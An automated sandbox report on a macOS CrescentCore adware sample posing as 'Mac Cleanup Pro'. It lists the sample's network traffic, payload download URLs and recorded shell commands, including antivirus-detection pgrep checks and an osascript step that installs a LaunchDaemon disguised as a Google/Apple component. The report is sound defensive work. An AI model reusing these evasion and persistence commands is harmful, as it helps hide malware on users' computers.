Loading ...

Play interactive tourEdit tour

Analysis Report 7UCvOfE6UM

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:79020
Start date:01.07.2019
Start time:11:04:04
Joe Sandbox Product:Cloud
Overall analysis duration:0h 14m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:7UCvOfE6UM (renamed file extension from none to dmg)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal80.adwa.spyw.evad.macDMG@0/889@12/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 172.217.16.206, 23.10.249.152, 23.10.249.171, 23.10.249.146, 23.10.249.168, 17.253.57.207, 17.253.55.211, 172.217.21.202, 216.58.205.234, 172.217.21.234, 172.217.22.10, 172.217.18.170, 172.217.23.138, 216.58.207.42, 172.217.16.170, 172.217.16.138, 172.217.22.74, 172.217.22.106, 216.58.210.10, 172.217.18.106, 216.58.206.10, 172.217.18.99, 216.58.210.4
  • Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, gstaticadssl.l.google.com, fonts.googleapis.com, www-google-analytics.l.google.com, ajax.googleapis.com, fonts.gstatic.com, a279.dscq.akamai.net, googleapis.l.google.com, ocsp.int-x3.letsencrypt.org.edgesuite.net, a771.dscq.akamai.net, googleadapis.l.google.com, mesu.g.aaplimg.com, isrg.trustid.ocsp.identrust.com, www.google.com, mesu.apple.com, isrg.trustid.ocsp.identrust.com.edgesuite.net, www.google-analytics.com
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold800 - 100Report FP / FNfalsemalicious

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsAppleScript3Hidden Files and Directories1Launch Daemon3Hidden Files and Directories1Credential DumpingSecurity Software Discovery1AppleScript3Data from Local SystemData Encrypted1Standard Cryptographic Protocol1
Replication Through Removable MediaScripting2Launch Agent4Accessibility FeaturesScripting2Network SniffingSystem Information Discovery441Remote File Copy4Data from Removable MediaExfiltration Over Other Network MediumRemote File Copy4
Drive-by CompromiseUser Execution1Launch Daemon3Path InterceptionFile Deletion1Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol5
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingCode Signing1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol5

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Writes files containing public keys to diskShow sources
Source: /bin/cp (PID: 806)File created 'PUBLIC KEY' pattern: /Applications/Mac Cleanup Pro.app/Contents/Resources/dsa_pub.pemJump to dropped file

Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.202
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.202
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:51 GMTAccept-Ranges: bytesETag: "806980c821d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 4891Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 3d 6b 8f db b6 96 df 0b f4 3f 68 6f 11 a4 09 2c 8f de f6 4c b1 01 32 33 c9 26 40 33 cd e6 81 7e 58 2c 02 5a a2 6d 6d 64 49 57 92 e3 99 16 f7 bf 2f 29 89 14 9f 7a d8 4e 6e 6e 71 a3 b6 41 65 e9 f0 f0 bc cf e1 21 b5 ca a2 07 e3 cf 1f 7f 30 d0 9f 75 96 56 e6 1a ec e2 e4 e1 ca 78 fc 5b 0e 53 a3 04 69 f9 78 56 ff 65 96 b0 88 d7 bf 34 8f e6 20 8a e2 74 73 65 58 f9 7d 7b 6b 07 8a 4d 9c b2 77 c2 2c c9 8a 2b e3 27 db c1 17 ba f9 8f 1f 7f f8 f1 87 6d b5 4b 66 06 3b ee 16 c6 9b 6d 75 65 d8 96 f5 c8 f8 8f 78 97 67 45 05 d2 8a bc b0 ce 8a 9d ea 51 f2 3b 20 3f 92 f1 2c cb b1 c3 80 fc 3c 2f f3 38 84 05 9d 64 92 01 04 20 81 eb aa 45 f3 10 47 d5 96 82 e4 66 e7 a0 c9 b4 13 6a 60 15 d9 c1 4c 33 b3 7d
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:26 GMTAccept-Ranges: bytesETag: "0b799b921d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 19147Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 5d b3 e3 b8 b1 20 f8 be bf 42 b7 3a 3a ba ca 25 a9 28 ea eb 48 8a 3e e3 bb 9e 89 b9 8e 18 df 97 f1 c3 44 b4 6b 37 28 91 3a a2 8b 12 65 92 aa 0f 6b 35 bf 7d f1 4d 20 91 09 52 aa d3 6d 4f 84 5d 61 5b 07 99 48 24 12 09 64 32 01 24 3e fc ee df fe af c1 ef 06 ff 77 59 36 75 53 25 e7 c1 e7 e9 78 3a 9e 0d de 1e 9a e6 bc fe f0 e1 25 6b b6 1a 36 de 95 c7 77 1c fb 0f e5 f9 5b 95 bf 1c 9a 41 1c 4d 26 23 f6 3f f3 c1 9f bf e4 4d 93 55 c3 c1 1f 4f bb 31 47 fa 1f f9 2e 3b d5 59 3a b8 9c d2 ac 1a fc e9 8f 7f 96 44 6b 4e 35 6f 0e 97 2d a7 f7 a1 f9 b2 ad 3f 98 26 3e 6c 8b 72 fb e1 98 d4 8c d4 87 ff f1 c7 3f fc b7 ff fc 9f ff 8d 37 f9 81 f1 39 38 95 d5 31 29 f2 bf 67 e3 5d 5d 73 46 a3 71 3c f8 ff
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Tue, 17 Apr 2018 07:57:29 GMTAccept-Ranges: bytesETag: "807a63bb21d6d31:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:39 GMTContent-Length: 1035Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ac 57 7b 6b e3 46 10 ff bb 81 7c 87 29 25 90 83 4a 27 c9 96 a5 c8 70 b4 a6 94 1e b4 d7 52 f2 05 d6 d6 5a 5a 22 ed 0a 69 9d f3 9d c9 77 ef 3e 6d 3d d6 3e e7 9a 17 36 9e f7 cc 6f 7e 1e c1 2f 35 ce 09 82 6e d3 62 4c 01 d1 1c ee 6b 42 bd 1c 3f 93 0d f6 3e 93 9c 97 59 f8 10 05 cd fe 9d 91 a2 fd 50 1a 07 89 92 1e 6e 6f fc 0d a3 1c 11 8a 5b 6f 5b ed 48 0e 07 90 ea 5a 0f b4 9b 25 bc dc de 88 bf db 9b 37 8e 4d ea e2 f1 33 13 21 d7 68 f3 54 b4 6c 47 f3 0c 7e da 06 f2 17 76 6d 75 ef fb ef 49 8d 0a dc bd ff 58 17 5e e4 37 b4 78 07 94 79 2d 6e 30 e2 30 0b ee 20 8e 65 82 27 07 5e 47 be e2 6c 91 88 8f 01 ed 38 5b 82 4c b0 c4 a4 28 79 36 8f 6d 39 2a 76 29 aa 18 45 9f 46 9d b9 a2 86 69 f0 7d 61 b7 64
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mcp/builds/mcp_mcpcnsppi.dmg HTTP/1.1Host: cdn.macclean-pro.comAccept-Language: en-CH;q=1.0, de-CH;q=0.9Accept: */*Connection: keep-aliveAccept-Encoding: gzip;q=1.0, compress;q=0.5User-Agent: Player/1.7 (com.l.r.l.m; build:3; OS X 10.13.2) Alamofire/4.8.1
Source: global trafficHTTP traffic detected: GET /ProductPrice.svc/GetCountryCode HTTP/1.1Host: cc.ppacti.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /ProductPrice.svc/GetCountryCode HTTP/1.1Host: cc.ppacti.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /ProductPrice.svc/PaddlePlanPrice/ch/91 HTTP/1.1Host: cc.ppacti.comContent-Type: application/jsonConnection: keep-aliveAccept: application/jsonUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Content-Length: 0Accept-Language: en-usAccept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /mcp/update/mcp.xml HTTP/1.1Host: cdn.maccleanuppro.comAccept: application/rss+xml,*/*;q=0.1Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mac Cleanup Pro/4.1.0 Sparkle/1.18.1
Source: global trafficHTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: helpermcp/1.0 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /mcp/prefs/mcpWebSets.plist HTTP/1.1Host: cdn.maccleanuppro.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: helpermcp/1.0 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /getip/ HTTP/1.1Host: www.getadvancedmac.comAccept: */*Cookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mac%20Cleanup%20Pro/4.1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1 HTTP/1.1Host: in.getadvancedmac.comUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /css/designer.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /css/bootstrap.min.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /css/styleResponsive.css HTTP/1.1Host: uin.getadvancedmac.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: in.getadvancedmac.comAccept: */*Connection: keep-aliveCookie: __utma=265934551.201815749.1561979134.1561979134.1561979134.1; __utmb=265934551.1.10.1561979134; __utmc=265934551; __utmt=1; __utmz=265934551.1561979134.1.1.utmcsr=mcpcnsppi|utmccn=mcpcnsppi|utmcmd=mcpcnsppi; ASP.NET_SessionId=vgwea11otp4gobhswgwbfk42; mmPRECKE=mmPRECKE0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0&x-uid=7119163505596825435&appversion=4.1.0&reinstall=1Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0 HTTP/1.1Host: www.getadvancedmac.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Upgrade-Insecure-Requests: 1Cookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.getadvancedmac.comAccept: */*Connection: keep-aliveCookie: ASP.NET_SessionId=ijr3gsrym20u41t2kxdankrkUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)Accept-Language: en-usReferer: http://www.getadvancedmac.com/mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0&utm_medium=mcpcnsppi&showPhone=1&utm_publisher=mcpcnsppi&pxl=MCP4094_MCP3998_RUNT&x-fetch=1&utm_campaign=mcpcnsppi&affiliateid=&x-at=&btnid=0Accept-Encoding: gzip, deflate
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: px-storage.com
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Jul 2019 09:05:40 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c
Urls found in memory or binary dataShow sources
Source: helpermcp.377.drString found in binary or memory: http://bgtc.macautofixer.com/maf/more/isr/mafrplcamc.zip
Source: helpermcp.377.drString found in binary or memory: http://bgtc.macautofixer.com/maf/more/isr/mafrplcamc.zipreplaceMTNAppAfterDownload:Mac
Source: Info.plist1.377.drString found in binary or memory: http://cdn.maccleanuppro.com/mcp/update/mcp.xml
Source: helpermcp.377.drString found in binary or memory: http://cdn.mymacutils.com/amc/more/silupd/advancedmaccleaner.zip
Source: helpermcp.377.drString found in binary or memory: http://cdn.mymacutils.com/amc/more/silupd/advancedmaccleaner.zipEtt$Bkvga$Uqmp
Source: Alamofire0.317.drString found in binary or memory: http://crl.apple.com/root.crl0
Source: Autoupdate.377.drString found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: jquery.min.js0.377.drString found in binary or memory: http://docs.jquery.com/License
Source: helpermcp.log.405.drString found in binary or memory: http://in.getadvancedmac.com/install/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpid=0
Source: jquery.min.js0.377.drString found in binary or memory: http://jquery.com/
Source: helpermcp.log.405.drString found in binary or memory: http://maccleanpro.esecureshoppe.com/mcp/plan?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lp
Source: Autoupdate.377.drString found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: Alamofire0.317.drString found in binary or memory: http://ocsp.apple.com/ocsp-wwdr010
Source: AlamofireString found in binary or memory: http://ocsp.apple.com/ocsp03-devid060
Source: jquery.min.js0.377.drString found in binary or memory: http://sizzlejs.com/
Source: helpermcp.log.405.drString found in binary or memory: http://uin.getadvancedmac.com/uninstall/mcp/?x-base=&utm_term=&utm_content=&utm_source=mcpcnsppi&lpi
Source: .dat.nosync02ed.9K4WCN.265.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: Alamofire0.317.drString found in binary or memory: http://www.apple.com/appleca/0
Source: Autoupdate.377.drString found in binary or memory: http://www.apple.com/appleca0
Source: AlamofireString found in binary or memory: http://www.apple.com/certificateauthority/0
Source: helpermcp.log.405.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackScans&x-base=&utm_term=&utm_content=&utm_source=mcpc
Source: helpermcp.log.405.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackUpdate&x-base=&utm_term=&utm_content=&utm_source=mcp
Source: helpermcp.377.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersAccepted&pxl=
Source: helpermcp.377.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersAccepted&pxl=IOPlatformExpertDeviceIOPlatfo
Source: helpermcp.377.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersView&pxl=
Source: helpermcp.377.drString found in binary or memory: http://www.getadvancedmac.com/mtrack/?metd=trackWebOffersView&pxl=wvh
Source: InAppPurchage.html.377.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: CFNetworkDownload_X8jW0f.tmp.265.drString found in binary or memory: https://api.crashlytics.com/spi/v1/platforms/mac/apps/com.l.r.l.m
Source: CFNetworkDownload_X8jW0f.tmp.265.drString found in binary or memory: https://api.crashlytics.com/spi/v2/platforms/mac/apps/com.l.r.l.m/beta_update_check
Source: CFNetworkDownload_X8jW0f.tmp.265.drString found in binary or memory: https://e.crashlytics.com/spi/v2/events
Source: InAppPurchage.html.377.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:100
Source: CFNetworkDownload_X8jW0f.tmp.265.drString found in binary or memory: https://reports.crashlytics.com/sdk-api/v1/platforms/android/apps/com.l.r.l.m/minidumps
Source: CFNetworkDownload_X8jW0f.tmp.265.drString found in binary or memory: https://reports.crashlytics.com/spi/v1/platforms/mac/apps/com.l.r.l.m/reports
Source: Alamofire0.317.drString found in binary or memory: https://www.apple.com/appleca/0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49469
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49468
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49489
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49464
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49471
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49470
Source: unknownNetwork traffic detected: HTTP traffic on port 49464 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49491
Source: unknownNetwork traffic detected: HTTP traffic on port 49468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49469 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49489 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49471 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49491 -> 443

Spam, unwanted Advertisements and Ransom Demands:

barindex
Detected macOS CrescentCoreShow sources
Source: /bin/mkdir (PID: 783)IOC directory created: /Library/Application Support/com.apple.spotlight.CoreJump to behavior
Writes HTML files containing JavaScript to diskShow sources
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/after_scan_nag.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/cta_clean.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/exit_nag.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/Discount_Popup.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/error_popup.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/openapp_popup.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/uninstall.htmJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/InAppPurchage.htmlJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/InAppPurchage_three.htmlJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/prm_nag.htmlJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/thnkyou.htmlJump to dropped file
Source: /bin/cp (PID: 806)HTML file containing JavaScript created: /Applications/Mac Cleanup Pro.app/Contents/Resources/thnkyoureg.htmlJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/Discount_Popup.htmJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/error_popup.htmJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/openapp_popup.htmJump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)HTML file containing JavaScript created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/uninstall.htmJump to dropped file

System Summary:

barindex
Malicious sample detected (through custom Yara rule)Show sources
Source: Alamofire, type: SAMPLEMatched rule: Detects macOS CrescentCore
Source: Player, type: SAMPLEMatched rule: Detects macOS CrescentCore
Classification labelShow sources
Source: classification engineClassification label: mal80.adwa.spyw.evad.macDMG@0/889@12/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

barindex
Attaches disk images with shell command 'hdiutil'Show sources
Source: /bin/sh (PID: 796)Hdiutil command executed: hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmgJump to behavior
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)Show sources
Source: /bin/sh (PID: 751)Shell process: hdiutil infoJump to behavior
Source: /bin/sh (PID: 752)Shell process: grep -e image-pathJump to behavior
Source: /bin/sh (PID: 754)Shell process: pgrep -f -i bitdefenderJump to behavior
Source: /bin/sh (PID: 755)Shell process: pgrep -f -i integoJump to behavior
Source: /bin/sh (PID: 756)Shell process: pgrep -f -i kasperskyJump to behavior
Source: /bin/sh (PID: 757)Shell process: pgrep -f -i nortonJump to behavior
Source: /bin/sh (PID: 758)Shell process: pgrep -f -i trend microJump to behavior
Source: /bin/sh (PID: 759)Shell process: pgrep -f -i clamxavJump to behavior
Source: /bin/sh (PID: 760)Shell process: pgrep -f -i esetJump to behavior
Source: /bin/sh (PID: 761)Shell process: pgrep -f -i f-secureJump to behavior
Source: /bin/sh (PID: 762)Shell process: pgrep -f -i avastJump to behavior
Source: /bin/sh (PID: 763)Shell process: pgrep -f -i aviraJump to behavior
Source: /bin/sh (PID: 764)Shell process: pgrep -f -i malwarebytesJump to behavior
Source: /bin/sh (PID: 765)Shell process: pgrep -f -i sophosJump to behavior
Source: /bin/sh (PID: 766)Shell process: pgrep -f -i zapJump to behavior
Source: /bin/sh (PID: 767)Shell process: pgrep -f -i total avJump to behavior
Source: /bin/sh (PID: 768)Shell process: pgrep -f -i bullguardJump to behavior
Source: /bin/sh (PID: 769)Shell process: pgrep -f -i pandaJump to behavior
Source: /bin/sh (PID: 770)Shell process: pgrep -f -i avgJump to behavior
Source: /bin/sh (PID: 771)Shell process: pgrep -f -i webrootJump to behavior
Source: /bin/sh (PID: 773)Shell process: ioreg -lJump to behavior
Source: /bin/sh (PID: 774)Shell process: grep -e ManufacturerJump to behavior
Source: /bin/sh (PID: 775)Shell process: mkdir /tmp/dddJump to behavior
Source: /bin/sh (PID: 776)Shell process: unzip -o /tmp/Updater.zip -d /tmp/dddJump to behavior
Source: /bin/sh (PID: 777)Shell process: rm -rf /tmp/Updater.zipJump to behavior
Source: /bin/sh (PID: 778)Shell process: osascript -e do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privilegesJump to behavior
Source: /bin/sh (PID: 783)Shell process: mkdir /Library/Application Support/com.apple.spotlight.CoreJump to behavior
Source: /bin/sh (PID: 784)Shell process: mv /tmp/ddd/Updater.app /Library/Application Support/com.apple.spotlight.CoreJump to behavior
Source: /bin/sh (PID: 785)Shell process: mv /tmp/com.google.keystone.plist /Library/LaunchDaemonsJump to behavior
Source: /bin/sh (PID: 786)Shell process: launchctl load -w /Library/LaunchDaemons/com.google.keystone.plistJump to behavior
Source: /bin/sh (PID: 789)Shell process: mkdir /Users/henry/Library/com.apple.spotlight.CoreJump to behavior
